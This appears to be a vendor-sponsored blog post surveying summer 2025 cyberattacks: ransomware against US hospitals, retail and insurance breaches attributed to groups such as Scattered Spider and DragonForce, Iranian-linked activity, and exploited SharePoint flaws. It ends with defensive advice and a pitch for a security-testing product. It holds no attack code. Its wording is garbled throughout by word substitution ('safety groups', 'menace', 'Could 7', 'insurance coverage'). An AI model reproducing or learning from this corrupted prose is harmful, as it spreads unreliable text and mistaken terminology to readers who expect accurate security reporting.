Cyber Assaults Spiked in Summer time 2025

Summer time 2025 wasn’t simply sizzling; it was relentless.

Ransomware hammered hospitals, retail giants suffered information breaches, insurance coverage corporations had been hit by phishing, and nation-state actors launched disruptive campaigns.

From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers stored defenders on their heels.

This report breaks down the season’s most high-impact incidents and what safety groups have to do earlier than the following wave hits.

Summer time Expose Healthcare’s Rising Ransomware Danger

Hospitals cannot afford downtime, and attackers understand it. 

This summer time, ransomware teams focused healthcare, exploiting each the worth of affected person information and the urgency of care.

Interlock rises as a significant menace to US healthcare

A July 22, 2025, joint advisory by CISA, FBI, and HHS highlighted Interlock as a significant menace to the Healthcare and Public Well being (HPH) sector. The group is linked to round 14 incidents in 2025 alone, with a 3rd affecting solely healthcare suppliers.

What units Interlock aside is its use of “FileFix,” a PowerShell launcher that hides malicious scripts behind decoy file paths. It tips customers into operating payloads via File Explorer, bypassing typical safety detections.

Rhysida ransomware focused one other US healthcare middle

On July 8, 2025, the Rhysida ransomware group allegedly leaked delicate information from Florida Hand Heart, together with medical photos, driver’s licenses, and insurance coverage kinds. 

The clinic, which serves sufferers in Punta Gorda, Port Charlotte, and Fort Myers, was given simply seven days to reply earlier than the discharge.

Qilin recycles Scattered Spider playbook in wave of healthcare breaches

In June 2025, Qilin turned essentially the most lively ransomware group, recording 81 victims, 52 of them within the healthcare sector.

The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to realize entry, deploy ransomware, and exfiltrate delicate information similar to EHRs and insurance coverage data.

To maximise strain, Qilin went past encryption, leveraging legal-themed extortion ways like a “Name Lawyer” function and automatic negotiation instruments to drive sooner payouts.

Main Manufacturers Breached in Retail Cybercrime Wave

The retail sector could not escape the wave of cyberattacks sweeping via Summer time 2025.

Louis Vuitton breach marks third in 1 / 4

On July 2, 2025, Louis Vuitton UK suffered a knowledge breach exposing buyer contact information and buy historical past, its third LVMH model breach in three months after Dior and LV Korea. 

Days later, on July 10, UK police arrested 4 suspects tied to high-profile assaults on M&S, Co-op, and Harrods. 

The group is allegedly linked to Scattered Spider, a home menace actor recognized for social engineering and collaboration with ransomware operators like DragonForce, signaling the rising affect of homegrown cybercriminals on main retailers.

DragonForce hits US retail chain Belk

Between Could 7 and 11, 2025, on the opposite aspect of the Atlantic, North Carolina, primarily based retailer Belk suffered a knowledge breach.

DragonForce claimed duty, stating it exfiltrated 156 GB of buyer and worker information, together with names, Social Safety numbers, emails, order histories, and HR recordsdata, which had been later posted on its leak website after ransom negotiations stalled.

DragonForce, first rising in late 2023, operates as a ransomware-as-a-service cartel, itemizing roughly 136 victims by March 2025, lots of whom are in US and UK retail organizations.

Scattered Spider’s ways have shifted from retail to insurance coverage 

Scattered Spider (UNC3944), a local English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, help-desk impersonation, and typosquatted domains to breach UK retailers (M&S, Co-op, Harrods) in April–Could 2025. 

In mid-June 2025, the researchers flagged that Scattered Spider (UNC3944) had shifted from retail to focusing on US insurance coverage corporations.

• Aflac detected and contained unauthorized entry on June 12, 2025; buyer and worker private information (together with SSNs, well being claims) might have been compromised. 

• Erie Insurance coverage and Philadelphia Insurance coverage Firms additionally reported comparable cyber disruptions in early to mid-June, leading to operational downtime.

The intrusions matched Scattered Spider’s recognized tactical profile, although no ransomware was deployed, and programs remained operational.

State-Sponsored and Geopolitical Cyber Exercise

Not all cyber threats this summer time had been about cash. 

Nation-state hackers and hacktivists additionally made their mark, utilizing the turbulent geopolitical local weather to launch assaults.

• June 14–17, 2025: Professional-Israel hacktivist group Predatory Sparrow hit Iran’s Financial institution Sepah, disrupting banking companies, then destroyed ~$90M in crypto by breaching Nobitex and sending tokens to burn wallets.

• June 30, 2025: The US Division of Homeland Safety and CISA issued a joint alert warning of impending Iranian cyber retaliation focusing on crucial infrastructure within the US and Europe. 

These incidents function a stark reminder that cyber battle is now a frontline extension of geopolitical rigidity, one that may ripple far past borders and sectors.

Key Vulnerabilities Gaining Public Consideration 

A number of Microsoft SharePoint vulnerabilities had been exploited this summer time in a widespread cyber espionage marketing campaign often called ToolShell.

• CVE-2025-53770 is a crucial distant code execution flaw permitting unauthenticated attackers to run arbitrary code on weak on-prem SharePoint servers. Menace actors used it to deploy internet shells, steal credentials, and transfer laterally via enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025.

• CVE-2025-49704 and CVE-2025-49706 had been additionally added to the KEV on July 22 after being abused in chained assaults. The pair allows authentication bypass and code injection, permitting attackers to use unpatched SharePoint programs even when earlier fixes had been utilized.

The ToolShell marketing campaign focused organizations throughout the US, Europe, and the Center East, together with authorities businesses, vitality corporations, and telecom suppliers. 

Safety researchers say the attackers possible reverse-engineered Microsoft’s July Patch Tuesday fixes to develop the bypass utilized in CVE-2025-53770.

What to Take from the Summer time Wildfires in Cybersecurity?

From hospitals to retail giants and insurance coverage suppliers to nation-states, the season uncovered cracks in even essentially the most fortified environments. 

This is what safety groups ought to do subsequent.

Patch like your life will depend on it, as a result of they do in crucial sectors.

Begin with CISA KEV entries and high-severity CVEs, however do not cease there. Ask the more durable query: are you the type of goal that attackers go after?

Validate whether or not every CVE is definitely exploitable in your atmosphere.

Give attention to exploit chains, not simply the scores. That is what adversaries are doing.

Harden id as your new perimeter.

Social engineering labored higher than malware this summer time. Cease MFA fatigue assaults, reinforce help-desk verification, and restrict privileged entry. 

Practice your people, as a result of they had been the breach level.

Scattered Spider and others did not exploit a CVE; they exploited an individual. Run common simulations, replace phishing situations, and put together high-risk roles for real-world lures.

Look ahead to what occurs after preliminary entry.

Menace actors like Interlock and Qilin did not simply drop ransomware; they moved laterally, staged information, and evaded detection. Implement behavioral monitoring for methods, similar to PowerShell abuse, credential theft, and stealthy exfiltration.

Do not ignore legacy programs and ignored infrastructure.

Do not ignore legacy programs and ignored infrastructure. The ToolShell marketing campaign exploited unpatched on-prem SharePoint servers, many operating unsupported or outdated variations.

Whether or not it is growing older on-prem SharePoint, home equipment, or unmonitored legacy gear, isolate what you may’t improve, monitor what you may’t patch, and substitute what you’ve got ignored.

We strongly counsel simulating the talked about assaults to check the effectiveness of your safety controls towards real-life cyber assaults utilizing the Picus Safety Validation Platform.

You may as well check your defenses towards lots of of different malware and exploitation campaigns, similar to Medusa, Rhysida, and Black Basta, inside minutes with a 14-day free trial of the Picus Platform.

Sponsored and written by Picus Safety.